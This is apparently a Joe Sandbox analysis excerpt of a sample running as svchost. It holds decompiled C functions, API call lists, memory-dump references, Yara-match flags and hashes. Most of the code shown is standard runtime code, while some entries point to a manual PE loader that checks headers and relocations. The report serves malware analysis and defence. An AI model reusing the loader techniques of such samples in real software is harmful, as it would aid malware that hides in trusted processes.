                                                • API String ID: 2684776883-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • IsBadHugeReadPtr.KERNEL32(00000000,00000040), ref: 03996677
                                                • IsBadHugeReadPtr.KERNEL32(00005A4D,000000F8), ref: 03996695
                                                • IsBadHugeReadPtr.KERNEL32(00005A4D,000000F8), ref: 039966A9
                                                • IsBadHugeReadPtr.KERNEL32(00000000,00000040), ref: 039966CA
                                                • IsBadHugeReadPtr.KERNEL32(00000000,000000F8), ref: 039966EC
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: HugeRead
                                                • String ID:
                                                • API String ID: 2080902951-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 93%
                                                			E6FD5BC19() {
                                                				int _v8;
                                                				void* __ecx;
                                                				void* _t6;
                                                				int _t7;
                                                				char* _t13;
                                                				int _t17;
                                                				void* _t19;
                                                				char* _t25;
                                                				WCHAR* _t27;
                                                
                                                				_t27 = GetEnvironmentStringsW();
                                                				if(_t27 == 0) {
                                                					L7:
                                                					_t13 = 0;
                                                				} else {
                                                					_t6 = E6FD5BBE2(_t27);
                                                					_pop(_t19);
                                                					_t17 = _t6 - _t27 >> 1;
                                                					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
                                                					_v8 = _t7;
                                                					if(_t7 == 0) {
                                                						goto L7;
                                                					} else {
                                                						_t25 = E6FD59FEE(_t19, _t7);
                                                						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
                                                							_t13 = 0;
                                                						} else {
                                                							_t13 = _t25;
                                                							_t25 = 0;
                                                						}
                                                						E6FD59FB4(_t25);
                                                					}
                                                				}
                                                				if(_t27 != 0) {
                                                					FreeEnvironmentStringsW(_t27);
                                                				}
                                                				return _t13;
                                                			}













                                                APIs
                                                • GetEnvironmentStringsW.KERNEL32 ref: 6FD5BC22
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6FD5BC45
                                                  • Part of subcall function 6FD59FEE: HeapAlloc.KERNEL32(00000000,00000001,00000004,?,6FD5DAC8,00000001,00000000,?,6FD5BCF0,00000001,00000004,00000000,00000001,?,?,6FD59BAA), ref: 6FD5A020
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6FD5BC6B
                                                • _free.LIBCMT ref: 6FD5BC7E
                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6FD5BC8D
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                • String ID:
                                                • API String ID: 2278895681-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetEnvironmentStringsW.KERNEL32 ref: 039A915D
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 039A9180
                                                  • Part of subcall function 039A4899: RtlAllocateHeap.NTDLL(00000000,039920FE,73B76490), ref: 039A48CB
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 039A91A6
                                                • _free.LIBCMT ref: 039A91B9
                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 039A91C8
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                • String ID:
                                                • API String ID: 336800556-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 81%
                                                			E6FD5B18E(void* __ecx) {
                                                				intOrPtr _t2;
                                                				void* _t4;
                                                				void* _t10;
                                                				void* _t11;
                                                				void* _t13;
                                                				void* _t15;
                                                				long _t16;
                                                
                                                				_t11 = __ecx;
                                                				_t16 = GetLastError();
                                                				_t10 = 0;
                                                				_t2 =  *0x6fd6952c; // 0x7
                                                				_t19 = _t2 - 0xffffffff;
                                                				if(_t2 == 0xffffffff) {
                                                					L2:
                                                					_t15 = E6FD5A03C(_t11, 1, 0x364);
                                                					_pop(_t13);
                                                					if(_t15 != 0) {
                                                						_t4 = E6FD5A57C(_t13, __eflags,  *0x6fd6952c, _t15);
                                                						__eflags = _t4;
                                                						if(_t4 != 0) {
                                                							E6FD5AF50(_t13, _t15, 0x6fd6b568);
                                                							E6FD59FB4(_t10);
                                                							__eflags = _t15;
                                                							if(_t15 != 0) {
                                                								goto L9;
                                                							} else {
                                                								goto L8;
                                                							}
                                                						} else {
                                                							_push(_t15);
                                                							goto L4;
                                                						}
                                                					} else {
                                                						_push(_t10);
                                                						L4:
                                                						E6FD59FB4();
                                                						L8:
                                                						SetLastError(_t16);
                                                					}
                                                				} else {
                                                					_t15 = E6FD5A526(_t11, _t19, _t2);
                                                					if(_t15 != 0) {
                                                						L9:
                                                						SetLastError(_t16);
                                                						_t10 = _t15;
                                                					} else {
                                                						goto L2;
                                                					}
                                                				}
                                                				return _t10;
                                                			}











                                                APIs
                                                • GetLastError.KERNEL32(?,?,?,6FD5A355,6FD5A08E,?,6FD5B138,00000001,00000364,?,6FD59013,00000104,?,?,?,?), ref: 6FD5B193
                                                • _free.LIBCMT ref: 6FD5B1C8
                                                • _free.LIBCMT ref: 6FD5B1EF
                                                • SetLastError.KERNEL32(00000000,?,?,?,?,00000000,?,6FD556A6,FunctionProtocolHost,?,00000104,FunctionProtocolHost,?,00000104), ref: 6FD5B1FC
                                                • SetLastError.KERNEL32(00000000,?,?,?,?,00000000,?,6FD556A6,FunctionProtocolHost,?,00000104,FunctionProtocolHost,?,00000104), ref: 6FD5B205
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: ErrorLast$_free
                                                • String ID:
                                                • API String ID: 3170660625-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetLastError.KERNEL32(73B75870,039920FE,73BCF7E0,039A3979,039A48DC,73B76490,?,03997F07,039920FE,?,039920FE,00000010), ref: 039A5F6B
                                                • _free.LIBCMT ref: 039A5FA0
                                                • _free.LIBCMT ref: 039A5FC7
                                                • SetLastError.KERNEL32(00000000,?,039920FE,00000010), ref: 039A5FD4
                                                • SetLastError.KERNEL32(00000000,?,039920FE,00000010), ref: 039A5FDD
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$_free
                                                • String ID:
                                                • API String ID: 3170660625-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E6FD5D7CB(intOrPtr* _a4) {
                                                				intOrPtr _t6;
                                                				intOrPtr* _t21;
                                                				void* _t23;
                                                				void* _t24;
                                                				void* _t25;
                                                				void* _t26;
                                                				void* _t27;
                                                
                                                				_t21 = _a4;
                                                				if(_t21 != 0) {
                                                					_t23 =  *_t21 -  *0x6fd69b20; // 0x6fd69b18
                                                					if(_t23 != 0) {
                                                						E6FD59FB4(_t7);
                                                					}
                                                					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x6fd69b24; // 0x6fd6b6f8
                                                					if(_t24 != 0) {
                                                						E6FD59FB4(_t8);
                                                					}
                                                					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x6fd69b28; // 0x6fd6b6f8
                                                					if(_t25 != 0) {
                                                						E6FD59FB4(_t9);
                                                					}
                                                					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x6fd69b50; // 0x6fd69b1c
                                                					if(_t26 != 0) {
                                                						E6FD59FB4(_t10);
                                                					}
                                                					_t6 =  *((intOrPtr*)(_t21 + 0x34));
                                                					_t27 = _t6 -  *0x6fd69b54; // 0x6fd6b6fc
                                                					if(_t27 != 0) {
                                                						return E6FD59FB4(_t6);
                                                					}
                                                				}
                                                				return _t6;
                                                			}











                                                APIs
                                                • _free.LIBCMT ref: 6FD5D7E3
                                                  • Part of subcall function 6FD59FB4: HeapFree.KERNEL32(00000000,00000000,?,6FD5D862,?,00000000,?,00000000,?,6FD5D889,?,00000007,?,?,6FD5D4FB,?), ref: 6FD59FCA
                                                  • Part of subcall function 6FD59FB4: GetLastError.KERNEL32(?,?,6FD5D862,?,00000000,?,00000000,?,6FD5D889,?,00000007,?,?,6FD5D4FB,?,?), ref: 6FD59FDC
                                                • _free.LIBCMT ref: 6FD5D7F5
                                                • _free.LIBCMT ref: 6FD5D807
                                                • _free.LIBCMT ref: 6FD5D819
                                                • _free.LIBCMT ref: 6FD5D82B
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 90a96edc75a24c3d63b4b0ef137d758792d717004308bbf4c8a60dbbed1ee1b1
                                                • Instruction ID: 856b4d1dfd52f7b79a8077c9ef9c2d2c9d6ec0c56fe0c18fa6dfc1d7773e56a9
                                                • Opcode Fuzzy Hash: 90a96edc75a24c3d63b4b0ef137d758792d717004308bbf4c8a60dbbed1ee1b1
                                                • Instruction Fuzzy Hash: D7F04FB1508708DB8F90CF58E5C4C6AB7DBAB197207680806E518D7748CB30F8A0C6B1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • _free.LIBCMT ref: 039AE433
                                                  • Part of subcall function 039A496C: HeapFree.KERNEL32(00000000,00000000,?,039AE6CE,?,00000000,?,00000000,?,039AE972,?,00000007,?,?,039AC3DB,?), ref: 039A4982
                                                  • Part of subcall function 039A496C: GetLastError.KERNEL32(?,?,039AE6CE,?,00000000,?,00000000,?,039AE972,?,00000007,?,?,039AC3DB,?,?), ref: 039A4994
                                                • _free.LIBCMT ref: 039AE445
                                                • _free.LIBCMT ref: 039AE457
                                                • _free.LIBCMT ref: 039AE469
                                                • _free.LIBCMT ref: 039AE47B
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 6976127f0225e2477e803aeead2518674c27d02a63cfec74b9024284ec6f6739
                                                • Instruction ID: 68e48adcefbcf781d8c0d3801fca6c60cfad5ef3d9f405294c7bddcfaee73d9a
                                                • Opcode Fuzzy Hash: 6976127f0225e2477e803aeead2518674c27d02a63cfec74b9024284ec6f6739
                                                • Instruction Fuzzy Hash: 7DF0123691CA10A78624EA9DE481C57F3DDAAC0BD07A84A05F045EF745C770FC908AE4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E6FD59D6F(signed int __ecx) {
                                                				intOrPtr _t7;
                                                
                                                				asm("lock xadd [eax], ecx");
                                                				if((__ecx | 0xffffffff) == 0) {
                                                					_t7 =  *0x6fd69b10; // 0x3021d58
                                                					if(_t7 != 0x6fd698f0) {
                                                						E6FD59FB4(_t7);
                                                						 *0x6fd69b10 = 0x6fd698f0;
                                                					}
                                                				}
                                                				E6FD59FB4( *0x6fd6b55c);
                                                				 *0x6fd6b55c = 0;
                                                				E6FD59FB4( *0x6fd6b560);
                                                				 *0x6fd6b560 = 0;
                                                				E6FD59FB4( *0x6fd6b6d0);
                                                				 *0x6fd6b6d0 = 0;
                                                				E6FD59FB4( *0x6fd6b6d4);
                                                				 *0x6fd6b6d4 = 0;
                                                				return 1;
                                                			}





                                                APIs
                                                • _free.LIBCMT ref: 6FD59D8D
                                                  • Part of subcall function 6FD59FB4: HeapFree.KERNEL32(00000000,00000000,?,6FD5D862,?,00000000,?,00000000,?,6FD5D889,?,00000007,?,?,6FD5D4FB,?), ref: 6FD59FCA
                                                  • Part of subcall function 6FD59FB4: GetLastError.KERNEL32(?,?,6FD5D862,?,00000000,?,00000000,?,6FD5D889,?,00000007,?,?,6FD5D4FB,?,?), ref: 6FD59FDC
                                                • _free.LIBCMT ref: 6FD59D9F
                                                • _free.LIBCMT ref: 6FD59DB2
                                                • _free.LIBCMT ref: 6FD59DC3
                                                • _free.LIBCMT ref: 6FD59DD4
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 54789527d874aaac016276583b7f95d20497e8379f9c0cc632f7a6296688f450
                                                • Instruction ID: 53ade8bca6acdeb8c6414ad37840712986a8ec3f0b9e30461a4636b24376cbd2
                                                • Opcode Fuzzy Hash: 54789527d874aaac016276583b7f95d20497e8379f9c0cc632f7a6296688f450
                                                • Instruction Fuzzy Hash: F4F03AF5404B249BEF429F68A9408683B61B71A734B0C1606F5109B3E8D730B831CFB2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • _free.LIBCMT ref: 039A2D40
                                                  • Part of subcall function 039A496C: HeapFree.KERNEL32(00000000,00000000,?,039AE6CE,?,00000000,?,00000000,?,039AE972,?,00000007,?,?,039AC3DB,?), ref: 039A4982
                                                  • Part of subcall function 039A496C: GetLastError.KERNEL32(?,?,039AE6CE,?,00000000,?,00000000,?,039AE972,?,00000007,?,?,039AC3DB,?,?), ref: 039A4994
                                                • _free.LIBCMT ref: 039A2D52
                                                • _free.LIBCMT ref: 039A2D65
                                                • _free.LIBCMT ref: 039A2D76
                                                • _free.LIBCMT ref: 039A2D87
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 82b21d0d8df629f8a48e9d94fad86488a9e2dad89b1bbad330510ede0780e065
                                                • Instruction ID: d02ed212b3d8ffb2e5d098f3c527bc19068bbeeec99b011a5e419f0b4daec6da
                                                • Opcode Fuzzy Hash: 82b21d0d8df629f8a48e9d94fad86488a9e2dad89b1bbad330510ede0780e065
                                                • Instruction Fuzzy Hash: 97F05E7A83CB24CBCA12FF69B850845BB64B789A90304470AF4816E36EC77588129FD4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • IsBadHugeReadPtr.KERNEL32(00000000,00000040), ref: 03996D12
                                                • IsBadHugeReadPtr.KERNEL32(00000000,000000F8), ref: 03996D41
                                                  • Part of subcall function 03996530: IsBadHugeReadPtr.KERNEL32(?,00000040), ref: 03996542
                                                  • Part of subcall function 03996530: IsBadHugeReadPtr.KERNEL32(?,000000F8), ref: 03996564
                                                  • Part of subcall function 03996530: IsBadHugeReadPtr.KERNEL32(?,000000F8), ref: 03996578
                                                Strings
                                                • [-] Invalid address of relocations, xrefs: 03996EE5
                                                • [-] Invalid address of relocations block, xrefs: 03996ECF
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: HugeRead
                                                • String ID: [-] Invalid address of relocations$[-] Invalid address of relocations block
                                                • API String ID: 2080902951-3620647445
                                                • Opcode ID: 8e115a0acc3940c1b506c464801da7ae48a65a4e7938f26760dac6d0bed149ae
                                                • Instruction ID: 4635e796d5ed3eedbf9e7175dbd63d2414e65d3d85842d4b07b0941b8b0b39b7
                                                • Opcode Fuzzy Hash: 8e115a0acc3940c1b506c464801da7ae48a65a4e7938f26760dac6d0bed149ae
                                                • Instruction Fuzzy Hash: 4651C876E0021A9FEF10DEDCD88079DF3B9AF846A4F19407AD404A7201E732ED218755
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: H_prolog3_
                                                • String ID:
                                                • API String ID: 2427045233-3916222277
                                                • Opcode ID: 50098093bd811a7eb60ce2a477e00263097a1961a62e6397ccd291092fe90975
                                                • Instruction ID: 81b821de139166554be7e25d48843c841f2618130f5b66cc5c12ac2d4b8aa1c1
                                                • Opcode Fuzzy Hash: 50098093bd811a7eb60ce2a477e00263097a1961a62e6397ccd291092fe90975
                                                • Instruction Fuzzy Hash: ED516235A1020A9FEF24DF9CD4909EEF7B9FF4A350F18495EE542AB240DB31A984CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 82%
                                                			E6FD5D954(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                                                				signed int _v8;
                                                				int _v12;
                                                				char _v16;
                                                				intOrPtr _v24;
                                                				char _v28;
                                                				void* _v40;
                                                				void* __esi;
                                                				signed int _t34;
                                                				signed int _t40;
                                                				int _t46;
                                                				int _t53;
                                                				void* _t55;
                                                				int _t57;
                                                				signed int _t63;
                                                				int _t67;
                                                				short* _t68;
                                                				signed int _t69;
                                                				short* _t70;
                                                
                                                				_t34 =  *0x6fd68008; // 0xc92c5105
                                                				_v8 = _t34 ^ _t69;
                                                				E6FD58DF3(__ebx,  &_v28, __edx, _a4);
                                                				_t57 = _a24;
                                                				if(_t57 == 0) {
                                                					_t53 =  *(_v24 + 8);
                                                					_t57 = _t53;
                                                					_a24 = _t53;
                                                				}
                                                				_t67 = 0;
                                                				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                				_v12 = _t40;
                                                				if(_t40 == 0) {
                                                					L15:
                                                					if(_v16 != 0) {
                                                						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                                                					}
                                                					return E6FD5599E(_v8 ^ _t69, _t68);
                                                				}
                                                				_t55 = _t40 + _t40;
                                                				_t17 = _t55 + 8; // 0x8
                                                				asm("sbb eax, eax");
                                                				if((_t17 & _t40) == 0) {
                                                					_t68 = 0;
                                                					L11:
                                                					if(_t68 != 0) {
                                                						E6FD57920(_t67, _t68, _t67, _t55);
                                                						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t68, _v12);
                                                						if(_t46 != 0) {
                                                							_t67 = GetStringTypeW(_a8, _t68, _t46, _a20);
                                                						}
                                                					}
                                                					L14:
                                                					E6FD5D2C6(_t68);
                                                					goto L15;
                                                				}
                                                				_t20 = _t55 + 8; // 0x8
                                                				asm("sbb eax, eax");
                                                				_t48 = _t40 & _t20;
                                                				_t21 = _t55 + 8; // 0x8
                                                				_t63 = _t21;
                                                				if((_t40 & _t20) > 0x400) {
                                                					asm("sbb eax, eax");
                                                					_t68 = E6FD59FEE(_t63, _t48 & _t63);
                                                					if(_t68 == 0) {
                                                						goto L14;
                                                					}
                                                					 *_t68 = 0xdddd;
                                                					L9:
                                                					_t68 =  &(_t68[4]);
                                                					goto L11;
                                                				}
                                                				asm("sbb eax, eax");
                                                				E6FD5FCD0();
                                                				_t68 = _t70;
                                                				if(_t68 == 0) {
                                                					goto L14;
                                                				}
                                                				 *_t68 = 0xcccc;
                                                				goto L9;
                                                			}






















                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00000100,?,00000000,?,?,00000000), ref: 6FD5D9A1
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 6FD5DA2A
                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6FD5DA3C
                                                • __freea.LIBCMT ref: 6FD5DA45
                                                  • Part of subcall function 6FD59FEE: HeapAlloc.KERNEL32(00000000,00000001,00000004,?,6FD5DAC8,00000001,00000000,?,6FD5BCF0,00000001,00000004,00000000,00000001,?,?,6FD59BAA), ref: 6FD5A020
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$AllocHeapStringType__freea
                                                • String ID:
                                                • API String ID: 573072132-0
                                                • Opcode ID: 182cb247431ec356843fa5c667a223d0ea9dcd2501d3101e2066ca67bfde14dd
                                                • Instruction ID: 4e2839b06af6c95566b3e0565763e102e8cb2f9a7e6e95fd291bd68377e64a89
                                                • Opcode Fuzzy Hash: 182cb247431ec356843fa5c667a223d0ea9dcd2501d3101e2066ca67bfde14dd
                                                • Instruction Fuzzy Hash: EB31AD72A0424AABDF15CFA4CC40EEF7BA6EB51714F044229EC14DB290E735E964CBB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000000,?,00000000,00000000,039A58EB,?,00000000,?,00000001,?,00000000,00000001,039A58EB,00000000), ref: 039AA013
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 039AA09C
                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,039A17C4,?), ref: 039AA0AE
                                                • __freea.LIBCMT ref: 039AA0B7
                                                  • Part of subcall function 039A4899: RtlAllocateHeap.NTDLL(00000000,039920FE,73B76490), ref: 039A48CB
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                • String ID:
                                                • API String ID: 2652629310-0
                                                • Opcode ID: 9e1d244e5854a20216e0092634487daf4333007fde3f03870cfdc2128e35baad
                                                • Instruction ID: 1552ebf95d653e6dc19ee16a025ce88b352b1d273eb5660707574aca11c31657
                                                • Opcode Fuzzy Hash: 9e1d244e5854a20216e0092634487daf4333007fde3f03870cfdc2128e35baad
                                                • Instruction Fuzzy Hash: E931E172A0062AABDF24DF69DC44DAFBBA9EB41350F084229EC05DB250E735CD50DBE0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 95%
                                                			E6FD5A3FF(signed int _a4) {
                                                				signed int _t9;
                                                				void* _t13;
                                                				signed int _t15;
                                                				WCHAR* _t22;
                                                				signed int _t24;
                                                				signed int* _t25;
                                                				void* _t27;
                                                
                                                				_t9 = _a4;
                                                				_t25 = 0x6fd6b280 + _t9 * 4;
                                                				_t24 =  *_t25;
                                                				if(_t24 == 0) {
                                                					_t22 =  *(0x6fd62098 + _t9 * 4);
                                                					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                                                					if(_t27 != 0) {
                                                						L8:
                                                						 *_t25 = _t27;
                                                						if( *_t25 != 0) {
                                                							FreeLibrary(_t27);
                                                						}
                                                						_t13 = _t27;
                                                						L11:
                                                						return _t13;
                                                					}
                                                					_t15 = GetLastError();
                                                					if(_t15 != 0x57) {
                                                						_t27 = 0;
                                                					} else {
                                                						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                                                						_t27 = _t15;
                                                					}
                                                					if(_t27 != 0) {
                                                						goto L8;
                                                					} else {
                                                						 *_t25 = _t15 | 0xffffffff;
                                                						_t13 = 0;
                                                						goto L11;
                                                					}
                                                				}
                                                				_t4 = _t24 + 1; // 0xc92c5106
                                                				asm("sbb eax, eax");
                                                				return  ~_t4 & _t24;
                                                			}











                                                APIs
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,6FD59013,00000000,00000000,?,6FD5A3A6,6FD59013,00000000,00000000,00000000,?,6FD5A5A3,00000006,FlsSetValue), ref: 6FD5A431
                                                • GetLastError.KERNEL32(?,6FD5A3A6,6FD59013,00000000,00000000,00000000,?,6FD5A5A3,00000006,FlsSetValue,6FD62550,6FD62558,00000000,00000364,?,6FD5B1DC), ref: 6FD5A43D
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,6FD5A3A6,6FD59013,00000000,00000000,00000000,?,6FD5A5A3,00000006,FlsSetValue,6FD62550,6FD62558,00000000), ref: 6FD5A44B
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: LibraryLoad$ErrorLast
                                                • String ID:
                                                • API String ID: 3177248105-0
                                                • Opcode ID: 0f1198a42a4a4fb51c6269b0922523578f8eba7cf733d368033fe7eb597ea5b4
                                                • Instruction ID: 909f635bd380b969a8bd61f2e6cc5921ffb93b146f87cd936cdcdfd811a91198
                                                • Opcode Fuzzy Hash: 0f1198a42a4a4fb51c6269b0922523578f8eba7cf733d368033fe7eb597ea5b4
                                                • Instruction Fuzzy Hash: F101D436655732ABDF514BB88C48A667798AF06BB1B140620F95AD7140DA24F82186F0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
